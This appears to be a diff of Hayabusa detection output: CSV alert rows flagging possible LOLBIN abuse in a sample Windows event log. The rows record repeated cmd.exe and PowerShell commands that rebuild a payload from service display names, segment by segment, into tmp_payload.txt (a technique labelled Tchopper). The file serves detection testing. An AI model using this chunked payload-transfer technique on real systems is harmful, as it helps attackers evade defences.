+2021-11-03 17:36:39.275 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg91"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:40.758 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg92"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:42.211 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:42.227 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg93"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:43.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg94"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x92c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:45.132 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg95"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:46.606 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg96"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:48.052 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:48.067 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg97"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:49.508 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x420 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:50.946 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaa0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:52.406 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:53.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:55.301 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:55.317 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:56.773 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:56.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:58.226 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe60 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:36:59.674 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:01.121 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:02.569 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:02.585 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:04.023 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:05.464 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:06.905 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:08.513 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg111"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:09.965 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg112"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf0c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:37:11.418 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg113"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd00 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
